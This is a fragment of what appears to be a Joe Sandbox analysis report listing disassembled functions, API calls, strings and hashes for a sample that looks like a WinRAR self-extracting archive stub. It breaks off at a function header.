    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ObjectRelease$CapsDevice
    • String ID: (
    • API String ID: 1061551593-3887548279
    • Opcode ID: ffd56bbea26762102a8f70d62364a768fbabfebefdde8bc0e9eaf6d5e23095a9
    • Instruction ID: 235bf26506d6f4e2b21e249f3833c8f00819bf808ed8997dbec2f312b741719d
    • Opcode Fuzzy Hash: ffd56bbea26762102a8f70d62364a768fbabfebefdde8bc0e9eaf6d5e23095a9
    • Instruction Fuzzy Hash: FA91DE71608750AFD620DF25C889E6BBBE9FFC9700F00491EF59AD7260DB31A845CB62
    Function 000C2938 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _swprintf
    • String ID: %ls$%s: %s
    • API String ID: 589789837-2259941744
    • Opcode ID: f6a058ad9375d03f3d50bd9e321ee9d4d5ddf7968eed0a1e8ea7491e30fbd4bd
    • Instruction ID: e1d80f46cfe746570bf0ac7a6811f155d3de30827d3968a698b3710ed98a38df
    • Opcode Fuzzy Hash: f6a058ad9375d03f3d50bd9e321ee9d4d5ddf7968eed0a1e8ea7491e30fbd4bd
    • Instruction Fuzzy Hash: 9A51A731688301FEEA352B94CC02FBE7655EB15B01F20450EF38BA5CE6C6B29950B71B
    Function 000D9320 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
    Download Yara Rule
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MpkkG8XzhJ.exe,00000104), ref: 000D9360
    • _free.LIBCMT ref: 000D942B
    • _free.LIBCMT ref: 000D9435
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$FileModuleName
    • String ID: C:\Users\user\Desktop\MpkkG8XzhJ.exe
    • API String ID: 2506810119-3359158184
    • Opcode ID: 27d90cf6bf8b9cd50c2e6543b54b8a0e9e0bab5fcc37764cbaaf219301f3676a
    • Instruction ID: 75ab4f19bc0861ba7720fe07678234c9ab0269e9fbaae10b723435447e65135f
    • Opcode Fuzzy Hash: 27d90cf6bf8b9cd50c2e6543b54b8a0e9e0bab5fcc37764cbaaf219301f3676a
    • Instruction Fuzzy Hash: 873190B1A04348EBDB21DB99DC81DDEBBF8EB86710F104067F50497342D7708A41CBA1
    Function 000D4356 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 000D437B
    • _abort.LIBCMT ref: 000D4486
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: EncodePointer_abort
    • String ID: MOC$RCC
    • API String ID: 948111806-2084237596
    • Opcode ID: 0d84dc15eea3de1283eec2d7651e0e925ae903a95bfd1e978c370c96dc6d5f9c
    • Instruction ID: 99ba10c32d57edc56cc33845073e3dab09ec80542c0fd4f7e92c1eb5af9acd33
    • Opcode Fuzzy Hash: 0d84dc15eea3de1283eec2d7651e0e925ae903a95bfd1e978c370c96dc6d5f9c
    • Instruction Fuzzy Hash: 5C414871900209AFCF15DF98CD81AEEBBB5BF48304F15815AF904B7362D3359A91DB61
    Function 000B7F1B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000B7F20
      • Part of subcall function 000B42F1: __EH_prolog.LIBCMT ref: 000B42F6
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 000B7FE5
      • Part of subcall function 000B8704: GetCurrentProcess.KERNEL32(00000020,?), ref: 000B8713
      • Part of subcall function 000B8704: GetLastError.KERNEL32 ref: 000B8759
      • Part of subcall function 000B8704: CloseHandle.KERNEL32(?), ref: 000B8768
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
    • String ID: SeRestorePrivilege$SeSecurityPrivilege
    • API String ID: 3813983858-639343689
    • Opcode ID: e2b528b10c7da54fa9f8cf06ea0d600327977d5b76381a12e397d377723c6636
    • Instruction ID: dd617a4272a00fa6da860aac0482a7eed03e6e17c413ace5362efd890d8a2148
    • Opcode Fuzzy Hash: e2b528b10c7da54fa9f8cf06ea0d600327977d5b76381a12e397d377723c6636
    • Instruction Fuzzy Hash: 3A31F431940249AEEF60EB649C06FFE7BADAB44354F004026F509B6192CE788E44DB61
    Function 000CBDD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • EndDialog.USER32(?,00000001), ref: 000CBE58
    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 000CBE6D
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 000CBE82
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: ASKNEXTVOL
    • API String ID: 364370097-3402441367
    • Opcode ID: a3f0372d39e2a6998f1a44b029f4a81006a337e65293640678adacda70272480
    • Instruction ID: 32bbcbb7abe0585408013fa8f93505d66d52feb9134b548bc89cdfa8435f90eb
    • Opcode Fuzzy Hash: a3f0372d39e2a6998f1a44b029f4a81006a337e65293640678adacda70272480
    • Instruction Fuzzy Hash: 1511D032600611BFD7259FA8DE06FFE3BADEB4AF40F004019F740AB0A5C762995187A6
    Function 000BEC0C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
    Download Yara Rule
    APIs
    • __fprintf_l.LIBCMT ref: 000BEC74
    • _strncpy.LIBCMT ref: 000BECBA
      • Part of subcall function 000C30E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,000F3070,?,000BEC48,00000000,?,00000050,000F3070), ref: 000C3102
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ByteCharMultiWide__fprintf_l_strncpy
    • String ID: $%s$@%s
    • API String ID: 562999700-834177443
    • Opcode ID: 1d62420d4514d50cfb981e8b2844bc8a1464a671d4250c76cee432dcc78122a0
    • Instruction ID: 569c42d9677b2d1a03a62659770904dc3ddd5390c07298ba4d9baddf993471a5
    • Opcode Fuzzy Hash: 1d62420d4514d50cfb981e8b2844bc8a1464a671d4250c76cee432dcc78122a0
    • Instruction Fuzzy Hash: BB217F72540388AEEB20DFA4CD45FEF3FE8AF04700F140526FA159A292E771DA458BA1
    Function 000C215F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
    Download Yara Rule
    APIs
    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,000BC04A,00000008,?,00000000,?,000BE685,?,00000000), ref: 000C219E
    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,000BC04A,00000008,?,00000000,?,000BE685,?,00000000), ref: 000C21A8
    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,000BC04A,00000008,?,00000000,?,000BE685,?,00000000), ref: 000C21B8
    Strings
    • Thread pool initialization failed., xrefs: 000C21D0
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Create$CriticalEventInitializeSectionSemaphore
    • String ID: Thread pool initialization failed.
    • API String ID: 3340455307-2182114853
    • Opcode ID: d781005cf5df9ecd8c67a1932a270e63f2a9e2ab8565cab0aabfdbf5cafc50e8
    • Instruction ID: 6c6aeec4877bf77bfcf8e2c1bb30fae43ba52b02645b0c229d03f35911b5c59e
    • Opcode Fuzzy Hash: d781005cf5df9ecd8c67a1932a270e63f2a9e2ab8565cab0aabfdbf5cafc50e8
    • Instruction Fuzzy Hash: 5711E7B1604708AFD3215F7A9CC4AABFBDCFB64744F18082EF6CAC7200D6705A408B60
    Function 000CC450 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • EndDialog.USER32(?,00000001), ref: 000CC49E
    • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 000CC4B6
    • SetDlgItemTextW.USER32(?,00000067,?), ref: 000CC4E4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: GETPASSWORD1
    • API String ID: 364370097-3292211884
    • Opcode ID: af1a90a23e27ccff5a94375b2e240c29e0bebaf94ed87cef079c78b79a893a09
    • Instruction ID: 955eaf1a3bfb2837d54d4f327971813628ede3770c04dcde8228ebf48f7398da
    • Opcode Fuzzy Hash: af1a90a23e27ccff5a94375b2e240c29e0bebaf94ed87cef079c78b79a893a09
    • Instruction Fuzzy Hash: C811C472A40128BAEB395B64DD59FFF7B6DEB49714F008168FB09F6480C27199429AA0
    Function 000CEE1D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID: RENAMEDLG$REPLACEFILEDLG
    • API String ID: 0-56093855
    • Opcode ID: 3fe189522667b37606bc114a4882de63c8b88ab2860f1b431203b95e61e3adad
    • Instruction ID: 0b7927d168c769ce4011b1a3c8e805274791dbe4b396e838c7828cc27d95c950
    • Opcode Fuzzy Hash: 3fe189522667b37606bc114a4882de63c8b88ab2860f1b431203b95e61e3adad
    • Instruction Fuzzy Hash: 66015271604284AFE7118F59EC48FAF7FA5AB4A3D4B044029F50593670C6759890EBA1
    Function 000B12F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000BF608: _swprintf.LIBCMT ref: 000BF62E
      • Part of subcall function 000BF608: _strlen.LIBCMT ref: 000BF64F
      • Part of subcall function 000BF608: SetDlgItemTextW.USER32(?,000F0274,?), ref: 000BF6AF
      • Part of subcall function 000BF608: GetWindowRect.USER32(?,?), ref: 000BF6E9
      • Part of subcall function 000BF608: GetClientRect.USER32(?,?), ref: 000BF6F5
    • GetParent.USER32(?), ref: 000B132A
    • GetDlgItem.USER32(00000000,00003021), ref: 000B133A
    • SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ItemRectTextWindow$ClientParent_strlen_swprintf
    • String ID: 0
    • API String ID: 1283792255-4108050209
    • Opcode ID: 4aeb8cd947a2b99550eb33b5e2b3f0335742f9eeae415df58464f1fd41e75863
    • Instruction ID: 98d18ce29a4dbad9d4a5adf6021f65fe68db3d5c9cd5d8abeeb6cc1fed87e56f
    • Opcode Fuzzy Hash: 4aeb8cd947a2b99550eb33b5e2b3f0335742f9eeae415df58464f1fd41e75863
    • Instruction Fuzzy Hash: 69F0AF3010864CBBDF660F21CC29BF93BD9BB02B84F448124FD44958A2EB78CA90EA10
    Function 000B4957 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
    Download Yara Rule
    APIs
    • std::_Xinvalid_argument.LIBCPMT ref: 000B495C
      • Part of subcall function 000CFD0D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 000CFD19
      • Part of subcall function 000CFD0D: ___delayLoadHelper2@8.DELAYIMP ref: 000CFD3F
    • std::_Xinvalid_argument.LIBCPMT ref: 000B4967
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
    • String ID: string too long$vector too long
    • API String ID: 2355824318-1617939282
    • Opcode ID: 4a522bbac5aed8924613bdbc89f06fe935fe69465a35f34790d4b2caa118db7e
    • Instruction ID: 6b284947467f22b38f5194295fbd545bdf08888d200a80d27ab2fabca1c5ab8a
    • Opcode Fuzzy Hash: 4a522bbac5aed8924613bdbc89f06fe935fe69465a35f34790d4b2caa118db7e
    • Instruction Fuzzy Hash: EAF030312003446B8624AF59FC85DCFB7EEEF85B54751092AFA85D7603DBB0EA0487B6
    Function 000CAC14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33registryCOMMON
    Download Yara Rule
    APIs
    • LoadCursorW.USER32(00000000,00007F00), ref: 000CAC4B
    • RegisterClassExW.USER32(00000030), ref: 000CAC6C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ClassCursorLoadRegister
    • String ID: 0$RarHtmlClassName
    • API String ID: 1693014935-3342523147
    • Opcode ID: bbee496d66d143a6aceb09c2b3ecdbbb12b096518736a66972fea4b4c1f0e71c
    • Instruction ID: 95a045bcd53405bf332300516915b1b0be58b454d0465f08151da70b524d98ab
    • Opcode Fuzzy Hash: bbee496d66d143a6aceb09c2b3ecdbbb12b096518736a66972fea4b4c1f0e71c
    • Instruction Fuzzy Hash: E9F014B1D11218AFCB008F99D984ADEFBB8FB48314F50802EE505B7240D7B85A048FE4
    Function 000DABCA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: __alldvrm$_strrchr
    • String ID:
    • API String ID: 1036877536-0
    • Opcode ID: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
    • Instruction ID: 4d55490d28d5c074a9669ab0d69f8b485d0d22e90edf0b33820cb0d0563dd725
    • Opcode Fuzzy Hash: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
    • Instruction Fuzzy Hash: C4A13A72B007869FDB22CF18C8917AEBBE5EF56310F18416BE5959B382C6388D41C772
    Function 000BB74D Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
    Download Yara Rule
    APIs
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,000B8D5C,?,?,?), ref: 000BB7F3
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,000B8D5C,?,?), ref: 000BB837
    • SetFileTime.KERNEL32(?,000B8AEC,?,00000000,?,00000800,?,000B8D5C,?,?,?,?,?,?,?,?), ref: 000BB8B8
    • CloseHandle.KERNEL32(?,?,00000800,?,000B8D5C,?,?,?,?,?,?,?,?,?,?), ref: 000BB8BF
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$Create$CloseHandleTime
    • String ID:
    • API String ID: 2287278272-0
    • Opcode ID: 3b3690a380c1e46ffded94e37ff7fc2deef1d1e3006c87145cbac0cc1835da50
    • Instruction ID: c1724653cc5ce5f549ef8d1f242649c84009c1b3cd2a165fe974099f2d21d172
    • Opcode Fuzzy Hash: 3b3690a380c1e46ffded94e37ff7fc2deef1d1e3006c87145cbac0cc1835da50
    • Instruction Fuzzy Hash: 3141AA31288381ABE721DF24DC55FEEBBE8AF81700F14092DF5D197191DBA4DA48DB52
    Function 000B10E0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
